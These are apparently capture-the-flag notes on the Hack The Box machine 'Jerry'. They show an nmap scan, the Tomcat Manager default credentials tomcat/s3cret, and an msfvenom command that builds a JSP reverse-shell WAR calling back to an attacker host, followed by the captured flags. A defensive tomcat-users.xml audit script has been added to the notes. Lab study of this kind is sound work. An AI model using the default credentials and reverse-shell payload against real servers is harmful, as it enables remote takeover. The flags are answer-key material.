Jerry - 15.08.2021


Nmap

sudo ./nmapAutomator.sh -H 10.10.10.95 -t recon

+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.

http://10.10.10.95:8080/manager


Tomcat

https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat

Ability to upload a .war file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=9001 -f war -o revshell.war
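
Added example, not part of the original notes: a defender-side check of tomcat-users.xml that lists accounts able to deploy a .war through the Manager application and flags default credentials such as the tomcat / s3cret pair found above. The sample file and the extra entries in the default-credential list are constructed; it assumes plaintext passwords in the file, so digested passwords will not match.

```python
import xml.etree.ElementTree as ET

# Manager roles that allow deploying a WAR (HTML interface and text interface).
DEPLOY_ROLES = {"manager-gui", "manager-script"}

# Constructed shortlist of default pairs; ("tomcat", "s3cret") is the one from these notes.
DEFAULT_CREDS = {("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin")}

# Constructed sample of conf/tomcat-users.xml, embedded so the check runs offline.
SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deployer" password="constructed-long-value" roles="manager-script, manager-status"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
</tomcat-users>"""


def local(tag):
    """Drop an XML namespace prefix such as {http://tomcat.apache.org/xml}."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, deploy_roles, has_default_creds) for every account
    that holds a role allowing WAR deployment."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local(el.tag) != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        deploy = sorted(roles & DEPLOY_ROLES)
        if deploy:
            findings.append((name, deploy, (name, password) in DEFAULT_CREDS))
    return findings


if __name__ == "__main__":
    for name, roles, is_default in audit_tomcat_users(SAMPLE):
        status = "DEFAULT CREDENTIALS" if is_default else "review password"
        print(f"{name}: can deploy via {', '.join(roles)} -> {status}")
```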


user.txt

7004dbcef0f854e0fb401875f26ebd00

root.txt

04a8b36e1545a455393d067e772fe90e